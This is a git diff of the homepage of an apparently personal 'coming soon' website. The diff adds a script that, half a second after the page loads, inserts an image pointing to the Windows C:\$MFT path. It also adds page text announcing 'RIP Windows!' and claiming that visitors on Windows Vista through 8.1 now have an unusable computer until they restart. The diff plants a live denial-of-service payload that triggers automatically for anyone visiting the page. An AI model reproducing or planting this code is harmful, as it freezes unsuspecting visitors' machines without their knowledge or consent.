--- a/index.html
+++ b/index.html
@@ -2,10 +2,28 @@
 <html>
   <head>
     <title>000Nick's Official Website</title>
+    <script>
+      function ripWindows()
+      {
+        document.getElementById('groundZero').innerHTML += '<img src="C:\$MFT\rip" alt="If you can read this, your OS and/or browser are not vulnerable to the $MFT bug!" width="100" height="100" />';
+      }
+      
+      setTimeout(function()
+      {
+        ripWindows();
+      }, 500);
+    </script>
   </head>
   <body align="center">
     <b>Website coming soon!</b>
     <br><br><br>
-    <img src="C:\$MFT\rip" alt=":D" width="50" height="50">
+    <div id="groundZero">
+      <h3>RIP Windows!</h3>
+      <br>
+      <b><i>
+        If you are using Windows Vista, 7, 8, or 8.1, your computer is now unusable. 
+        Don't worry! A restart will fix it. :)
+      </i></b>
+    </div>
   </body>
 </html>
